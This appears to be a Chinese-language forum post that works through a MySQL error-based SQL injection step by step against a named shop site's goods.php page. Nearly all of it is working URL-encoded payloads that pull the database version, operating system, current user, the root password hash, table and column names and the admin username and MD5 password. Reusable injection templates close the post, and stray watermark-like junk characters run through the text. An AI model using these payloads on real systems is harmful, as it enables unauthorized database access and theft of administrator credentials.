盲注详细内容

admin

判断版本号
- s) ~& p2 C3 Z( z2 A* ^5 E1 h4 ^http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

判断系统

http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version_compile_os%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

' N5 U) |- D: l4 [3 H
) Y; }, \0 D$ t* F1 c2 L* t0 w
, w* q0 j5 j# Y' E* @" [2 B; k当前 user()
+ d& `5 A% r/ `0 Y* `
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20user()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
' b0 V% D( a2 f) H# h$ y
( [" L9 t) h2 ]0 O3 k) S
1 g6 B* T8 p0 u3 Q9 A+ c
; X" @$ o$ K9 P7 k/ R* W4 d当前 database()
7 x+ d0 z# @; v. K& Y6 k' r3 ]7 B. @http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20database()%20),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
: t  A1 Z- r: l  x; x1 @

7 }9 p7 ^2 h$ R& M

root hash
" l6 p1 L8 Q& C' h8 H
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20Password%20from%20mysql.user%20where%20User=char(114,111,111,116)),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
0 U6 n- B7 t$ Y+ \( \: J0 _

+ Y/ s# c# P6 G# m
当前 数据库表名
7 G: e9 N4 D3 r; G. Z& _: Y' X3 Y, X
7 ~2 h6 A  {" t" L8 u8 c4 e! Bhttp://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20TABLE_NAME%20%20from%20information_schema.tables%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20limit%206,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

0 V! W" }: d  ^  V% `. I- q
0 W, |' N# t1 z3 ~5 L! k+ H% p1 u
当前 数据库 user_name 字段

  |9 l* i8 z+ \  U! ^; J/ [6 |http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%202,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23

当前 数据库 字段 password
8 |+ W5 Z5 B  v; `http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20%20COLUMN_NAME%20from%20information_schema.COLUMNS%20where%20TABLE_SCHEMA=char(115,97,110,115,97,110,49)%20and%20TABLE_NAME=char(101,99,115,95,97,100,109,105,110,95,117,115,101,114)%20limit%204,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
; i* X5 P$ U7 ~3 J
6 A# C6 y* a6 i. W

# i) p7 I0 p; B3 B6 F" }' U/ S获得 admin passwd(md5)
/ K, T* V+ ^& w6 g* E9 M* D, B
* M/ @  e2 Z+ X  B( F
http://www.baiud.com/goods.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20concat_ws(char(94),ifnull(cast(%60password%60%20as%20char),char(32)),ifnull(cast(%60user_name%60%20as%20char),char(32)))%20%20from%20sansan1.ecs_admin_user%20limit%200,1),0x3a,floor(rand()*2))%20x%20from%20(select%201%20union%20select%202)%20a%20group%20by%20x%20limit%201)%23
, v  U. r" x) H9 K( X
报错注射
( V4 F8 P* G, Z% ~SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select version()) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)
  A/ y7 p, a9 w% {6 c
SELECT * FROM table_name where uid = -1 union select 1,(select 1 from(select count(*),concat((select (Select username FROM admin_table LIMIT 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x limit 0,1)a)

4 X  o( t- B' eand(select 1 from(select count(*),concat((select (select (Select concat(0x7e,0x27,SCHEMA_NAME,0x27,0x7e) FROM information_schema.SCHEMATA LIMIT 21,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)